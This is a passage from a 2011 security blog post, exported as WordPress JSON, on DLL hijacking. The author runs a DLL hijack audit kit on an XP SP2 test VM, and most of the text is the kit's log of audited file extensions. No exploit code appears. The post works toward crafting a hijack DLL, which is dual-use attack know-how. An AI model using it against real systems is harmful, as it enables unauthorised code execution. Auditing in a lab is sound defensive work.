{"id":289,"date":"2011-12-19T22:41:32","date_gmt":"2011-12-19T21:41:32","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=289"},"modified":"2012-02-02T12:37:51","modified_gmt":"2012-02-02T11:37:51","slug":"dll-hijacking","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2011\/12\/19\/dll-hijacking\/","title":{"rendered":"DLL Hijacking"},"content":{"rendered":"<p>So it&#8217;s been <a href=\"http:\/\/lmgtfy.com\/?q=DLL+Hijacking\" target=\"_blank\">spoken of alot<\/a> but i&#8217;d never actually got around to trying it. A colleague has been banging on about it for weeks and before he got chance to play with it a second colleague managed to use this in the wild. Sweet!<br \/>\nI decided it would be worth playing with in order to have a go at creating my own DLL and seeing what is vulnerable on my XP SP2 testing VM.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"bash codecolorer\">C:\\Documents and Settings\\Administrator\\Desktop\\DLLHijackAuditKit<span class=\"sy0\">&gt;<\/span>systeminfo<br \/>\nHost Name: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; XPSP2<br \/>\nOS Name: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Microsoft Windows XP Professional<br \/>\nOS Version: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;5.1.2600 Service Pack <span class=\"nu0\">2<\/span> Build <span class=\"nu0\">2600<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>First thing I needed to do was download the <a href=\"http:\/\/community.rapid7.com\/community\/metasploit\/blog\/2010\/08\/24\/better-faster-stronger-dllhijackauditkit-v2\" target=\"_blank\">DLLHijackingAuditKit that hdm created<\/a>. It&#8217;s currently on version 2 but I suspect it might change over time so keep your eyes peeled for new versions.<br \/>\nTo execute the code you just need to launch the 01_StartAudit.bat as an Administrator. You&#8217;ll notice Process Monitor will start up, dont close it, you&#8217;ll need output from this later.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/>32<br \/>33<br \/>34<br \/>35<br \/>36<br \/>37<br \/>38<br \/>39<br \/>40<br \/>41<br \/>42<br \/>43<br \/>44<br \/>45<br \/>46<br \/>47<br \/>48<br \/>49<br \/>50<br \/>51<br \/>52<br \/>53<br \/>54<br \/>55<br \/>56<br \/>57<br \/>58<br \/>59<br \/>60<br \/>61<br \/>62<br \/>63<br \/>64<br \/>65<br \/>66<br \/>67<br \/>68<br \/>69<br \/>70<br \/>71<br \/>72<br \/>73<br \/>74<br \/>75<br \/>76<br \/>77<br \/>78<br \/>79<br \/>80<br \/>81<br \/>82<br \/>83<br \/>84<br \/>85<br \/>86<br \/>87<br \/>88<br \/>89<br \/>90<br \/>91<br \/>92<br \/>93<br \/>94<br \/>95<br \/>96<br \/>97<br \/>98<br \/>99<br \/>100<br \/>101<br \/>102<br \/>103<br \/>104<br \/>105<br \/>106<br \/>107<br \/>108<br \/>109<br \/>110<br \/>111<br \/>112<br \/>113<br \/>114<br \/>115<br \/>116<br \/>117<br \/>118<br \/>119<br \/>120<br \/>121<br \/>122<br \/>123<br \/>124<br \/>125<br \/>126<br \/>127<br \/>128<br \/>129<br \/>130<br \/>131<br \/>132<br \/>133<br \/>134<br \/>135<br \/>136<br \/>137<br \/>138<br \/>139<br \/>140<br \/>141<br \/>142<br \/>143<br \/>144<br \/>145<br \/>146<br \/>147<br \/>148<br \/>149<br \/>150<br \/>151<br \/>152<br \/>153<br \/>154<br \/>155<br \/>156<br \/>157<br \/>158<br \/>159<br \/>160<br \/>161<br \/>162<br \/>163<br \/>164<br \/>165<br \/>166<br \/>167<br \/>168<br \/>169<br \/>170<br \/>171<br \/>172<br \/>173<br \/>174<br \/>175<br \/>176<br \/>177<br \/>178<br \/>179<br \/>180<br \/>181<br \/>182<br \/>183<br \/>184<br \/>185<br \/>186<br \/>187<br \/>188<br \/>189<br \/>190<br \/>191<br \/>192<br \/>193<br \/>194<br \/>195<br \/>196<br \/>197<br \/>198<br \/>199<br \/>200<br \/>201<br \/>202<br \/>203<br \/>204<br \/>205<br \/>206<br \/>207<br \/>208<br \/>209<br \/>210<br \/>211<br \/>212<br \/>213<br \/>214<br \/>215<br \/>216<br \/>217<br \/>218<br \/>219<br \/>220<br \/>221<br \/>222<br \/>223<br \/>224<br \/>225<br \/>226<br \/>227<br \/>228<br \/>229<br \/>230<br \/>231<br \/>232<br \/>233<br \/>234<br \/>235<br \/>236<br \/>237<br \/>238<br \/>239<br \/>240<br \/>241<br \/>242<br \/>243<br \/>244<br \/>245<br \/>246<br \/>247<br \/>248<br \/>249<br \/>250<br \/>251<br \/>252<br \/>253<br \/>254<br \/>255<br \/>256<br \/>257<br \/>258<br \/>259<br \/>260<br \/>261<br \/>262<br \/>263<br \/>264<br \/>265<br \/>266<br \/>267<br \/>268<br \/>269<br \/>270<br \/>271<br \/>272<br \/>273<br \/>274<br \/>275<br \/>276<br \/>277<br \/>278<br \/>279<br \/>280<br \/>281<br \/>282<br \/>283<br \/>284<br \/>285<br \/>286<br \/>287<br \/>288<br \/>289<br \/>290<br \/>291<br \/>292<br \/>293<br \/>294<br \/>295<br \/>296<br \/>297<br \/>298<br \/>299<br \/>300<br \/>301<br \/>302<br \/>303<br \/>304<br \/>305<br \/>306<br \/>307<br \/>308<br \/>309<br \/>310<br \/>311<br \/>312<br \/><\/div><\/td><td><div class=\"bash codecolorer\">C:\\Documents and Settings\\Administrator\\Desktop\\DLLHijackAuditKit<span class=\"sy0\">&gt;<\/span>01_StartAudit.bat<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Starting the audit...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Starting the process monitor...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Creating <span class=\"kw3\">test<\/span> cases <span class=\"kw1\">for<\/span> each <span class=\"kw2\">file<\/span> extension...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Created <span class=\"nu0\">303<\/span> <span class=\"kw3\">test<\/span> cases<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Protecting <span class=\"nu0\">30<\/span> processes<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"nu0\">323<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: aca<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: acf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: acs<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: acw<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ai<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: aif<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: aifc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: aiff<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ani<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: aps<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: asa<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ascx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: asf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: asm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: asmx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: asp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: aspx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: asx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: au<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: audiocd<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: avi<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: bfc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: bin<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: bkf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: blg<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: bmp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: bsc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: c<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: cab<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw2\">cat<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: cda<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: cdf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: cdx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: cer<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: cgm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: chk<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: chm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: clp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: cmd<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: cnf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw2\">cpp<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: crl<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: crt<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: css<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: csv<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ctt<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: cur<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: cxx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dat<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: db<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dbg<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dct<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: def<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: der<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: desklink<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dib<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dic<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: diz<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dl_<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: doc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dot<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dsn<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dun<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dvd<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: dvr-ms<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: emf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: eml<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: eps<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: exp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ex_<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: eyb<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: fif<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: fnd<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: fnt<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: folder<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: fon<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ghi<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: gif<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: grp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: gz<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: h<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: hhc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: hlp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: hpp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: hqx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ht<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: hta<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: htc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: htm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: html<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: htt<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: htw<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: htx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: hxx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: icc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: icm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ico<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: idb<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: idl<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: idq<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: iii<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ilk<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: imc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: inc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: inf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ini<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ins<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: inv<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: inx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: in_<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: isp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: its<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ivf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw2\">java<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: jbf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: jfif<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: job<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: jod<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: jpe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: jpeg<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: jpg<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: js<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: jse<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: latex<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: lib<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: lnk<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw3\">local<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: log<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: lwv<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: m14<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: m1v<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: m3u<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw2\">man<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: manifest<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mapimail<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mdb<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mht<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mhtml<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mid<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: midi<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mmf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mmm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mov<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: movie<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mp2<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mp2v<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mp3<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mpa<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mpe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mpeg<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mpg<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mpv2<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: msc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: msg<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: msi<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: msp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: msrcincident<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: msstyles<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mswmm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw2\">mv<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: mydocs<br \/>\n<span class=\"br0\">&#91;<\/span><span 